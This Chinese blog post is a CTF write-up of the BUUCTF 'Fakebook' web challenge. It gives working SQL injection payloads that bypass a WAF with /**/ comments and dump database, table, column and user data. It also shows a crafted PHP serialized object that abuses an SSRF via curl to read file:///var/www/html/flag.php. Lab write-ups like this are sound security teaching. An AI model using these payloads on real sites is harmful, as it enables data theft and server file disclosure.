BUUCTF WEB FAKEBOOK

最新推荐文章于 2023-11-13 10:10:50 发布
最新推荐文章于 2023-11-13 10:10:50 发布
阅读量184 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/121064232
版权

继续复习之旅,攻防世界暂时不做了,最近比较忙,等过一段时间继续刷
这题之前攻防世界刷过,考的是sql注入,注册页面没看出来啥,正常注册,zhaoxian,zhaoxian
然后点进去发现有一个get参数,直接一个单引号过去,发现回显报错了,那么sql注入没跑了

关键怎么利用,order by到5,开始报错,说明四列
union select触发了waf,经尝试,/**/绕过空格即可过
尝试payload:?no=-1 union/**/select 1,2,3,4#
提示无法反序列化,而username回显2,代表我们拿到了注入点
正常思路,数据库名,表名,列名,爆数据
数据库名:?no=-1 union/**/select 1,database(),3,4# //fakebook
表名:no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'# //users
列名:no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='fakebook' and table_name='users'#
//no,username,passwd,data 	为什么要加库名,那是因为还存在其他的users表
爆数据:no=-1 union/**/select 1,group_concat(no,username,passwd,data),3,4 from fakebook.users#
可以看到返回的是一个序列化后的数据,就是我们注册时的数据,到了这单纯的sql就断了,下面其实是一个ssrf过程
页面上有the contents of his/her blog,说明他是在尝试读取我们给的blog内容的,既然外部的域名地址能读,那本地地址应该也能读,也就是个猜测
先扫目录吧,robots.txt,疯狂惊喜,user.php.bak,离拿flag不远了
<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
可以看到get函数里尝试用curl读取blog的内容,那我们就猜对了,很明显isValidBlog只在注册时启用,鉴于我们已经注册成功,现在这就是个废函数
下面就是flag在哪的问题了,别问,问就是猜出来的,因为正常用来爆破的字典不会带flag.php这种名称的,所以不是扫描器不好使,而是字典不好使
根据之前爆破数据库得出的序列化数据,data数据应该是一个UserInfo的序列化对象,blog值是他的一个属性
构造一下
<?php
class Userinfo
{
    public $name = "xiaofu";
    public $age = 1;
    public $blog = "file:///var/www/html/flag.php";
}
$data = new Userinfo();
echo serialize($data);
?>
最终payload:/view.php?no=-1 union/**/select 1,2,3,'O:8:"Userinfo":3:{s:4:"name";s:6:"xiaofu";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
flag在页面源码里,是base64编码,解码一下就好

参考视频链接:https://www.bilibili.com/video/BV1Kh411t7yJ/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf-[网鼎杯 2018]Fakebook
qq_42728977的博客
12-17 1075
[网鼎杯 2018]Fakebook考点复现法1,load_file()法2,纯sql注入总结参考 考点 sql注入 复现 法1,load_file() 注册登陆之后 http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0 可能存在注入点,尝试,发现确实有 http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0 un
BUUCTF——[网鼎杯 2018]Fakebook
Ho1aAs‘s Blog
05-24 400
文章目录利用点解题无 利用点 SQL注入 SSRF读文件 解题 打开环境,没有任何提示,先试试基础功能,注册一个号,回到主页可以点进去看记录 发现URL是拼接上序号的,试试SQL注入,发现是字符型闭合单引号的注入 先看看字段数 无 ...
BUUCTF[网鼎杯2018]Fakebook
weixin_45253622的博客
05-22 689
我们注册一个账号看看: 注册成功如下: 这里需要注意,王小帥是可以点击的,url变为:http://df1a9115-0e1d-43b2-97e0-2d5ba843acf8.node3.buuoj.cn/view.php?no=1我们试试sql注入; payload:http://df1a9115-0e1d-43b2-97e0-2d5ba843acf8.node3.buuoj.cn/view.php?no=1' 没什么卵用,我们访问ro...
BUUCTF [web专项33][网鼎杯 2018]Fakebook
yanglinchiji的博客
11-13 58
先登录,万能密码登录发现不行选择注册,随便注册一个进入用户界面发现url有很经典的模板 no=1尝试注入发现报错注入可以显示先来查列数爆库名(全部)最有可能库的还是fakebook查表查字段查数据可以看到有考验反序列化的地方但是我突然想到之前有一道题可以注入一个临时用户或许可以改变blog来修改。
BUUCTF Fakebook
weixin_44377940的博客
03-18 933
注册一个admin账户,然后登陆,没有发现什么东西。 点进view.php一看,发现好像有个注入点。 尝试注入,发现对union进行了过滤,可以用/**/进行绕过。 可以看到有一个反序列化,然后我就没有思路了。 看了wp才知道,还有个备份文件user.php.bak和flag.php,user.php.bak代码如下: <?php class UserInfo { public...
Facebook Web优化策略
01-10
Facebook Web优化策略
web版facebook登录
04-05
NULL 博文链接:https://ocaicai.iteye.com/blog/1534547
Facebook-clone-web
10-13
项目使用React框架 materialUI整体模仿facebook网站,功能实时发布帖子,通过firebase提供登录验证及用户细心,firebase真实接口及部署到远程服务器
Facebook基础知识
最新发布
04-22
一、继承FaceBook SDK前置工作 二、深度链接 三、应用事件 四、投放名词解释 五、Facebook 广告目标分类 六、Facebook 广告系统结构 七、Facebook 广告主要参数 一、继承FaceBook SDK前置工作: 1、阅读相关文档:...
预测facebook签到位置
08-24
预测facebook签到位置
BUUCTF[网鼎杯 2018]Fakebook
qq_62078839的博客
03-16 2358
打开连接,发现登录要注册,那我们先注册个账号 发现可以点进去查看 习惯性查看网页源代码 点击发现打开了我们注册博客的地址,猜测可能存在SSRF,但现在还不知道如何使用,我们再来审查其他地方 发现个注入点,尝试sql注入 首先查列数 payload:?no=1 order by 5 发现报错 将列数改为4,发现正确 payload:no=-1 union/**/select 1,2,3,4 发现回显是第二个字段的位置,注意这里出现的序列化,可...
BUUCTF[网鼎杯 2018]Fakebook 1
snowlyzz的博客
05-01 844
来到首页先创建了一个用户 点击自己创建的用户admin: 发现url 疑似有sql注入。   ?n=1 and 1=1 正常回显   ?n=1 and 1=2 回显异常(存在SQL注入)   ?n=1 order by 1# 正常回显   ?n=1 order by 2# 正常回显   ?n=1 order by 3# 正常回显   ?n=1 order by 4# 正常回显   ?n=1 order by 5# 回显异常(判断存在4个字段) 直接联合查询,发现 uni...
四个有关文件传输的CTF WEB题(深育杯FakeWget、极客大挑战where_is_my_FUMO、2021陇原战疫CheckIN、N1CTF-curl trick)
Love&Share
11-27 2680
文章目录深育杯FakeWget极客大挑战where_is_my_FUMO2021陇原战疫CheckINN1CTF-curl trick 前两题wp来自官方发布,觉得这四个题挺有意思的所以整理了下 深育杯FakeWget 题目只有三个路由,一个输入点,容易判断考点是命令注入,因此需要先不断测试传入数据并刷新观察回显,来猜测后端与wget命令拼接逻辑和过滤逻辑,下面是三个比较典型的fuzz示例: www.baidu.com teststr with space www.baidu.com这里fuzz出.
BUUCTF WEB [网鼎杯 2018]Fakebook
Y1da的博客
04-20 459
BUUCTF WEB [网鼎杯 2018]Fakebook 进入环境,尝试各种功能,没能发现漏洞点,使用dirsearch扫描 200 0B http://0fa8f160-8480-4f08-8eeb-df4cacc76aaa.node4.buuoj.cn:81/db.php 200 0B http://0fa8f160-8480-4f08-8eeb-df4cacc76aaa.node4.buuoj.cn:81/error.php 200 0B http://0f
解网鼎杯一道web题(fakebook
热门推荐
洞若观火
08-23 1万+
扫描: nikto扫描: 发现隐藏的robots.txt,其中有源码泄漏(/user.php.bak),输入到地址栏,得到文件user.php.bak。然后用御剑扫描,发现flag.php。 user.php.bak源码: &lt;?php class UserInfo {     public $name = "";     public $age = 0;     public $...
BUUCTF WEB Fakebook
A_dmin的博客
12-20 633
BUUCTF WEB Fakebook 进入页面发现有个登录有个注册!!! 注册一个账号登录: 有个参数,下面应该是会显示你网址的博客地址!!! 有参数肯定是进行SQL注入尝试!!发现存在盲注!no=1=1=1与no=1=0=1回显是不一样的!! 不过好像还有报错注入!!有四个字段!! 后面发现空格被过滤了??使用/**/代替,存在报错注入: 尝试注入: ...
BUUCTFWEB-WarmUp
迷风小白
06-25 1万+
拿到题目,一个表情包,顺便扫一下目录
2019 D^3CTF_wp:fakeonlinephp解法(类实网渗透)
Smity的博客
11-26 3474
D3ctf fake_online_php 题解 外网渗透部分 smb协议利用导致远程文件包含 http://35547429ed.fakeonelinephp.d3ctf.io/?orange=\**********\share\test5&a=…\nc2.exe±e+cmd+39.105.136.196+30023 内网渗透部分 再写一个马子 进入远程桌面 ...
facebook爬虫
04-21
Facebook爬虫的实现方式有多种,其中一种常见的方式是使用Web scraping技术。通过发送HTTP请求,爬虫可以获取Facebook网页的HTML源代码,然后使用解析库(如BeautifulSoup)来提取所需的数据。 然而,需要注意的是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值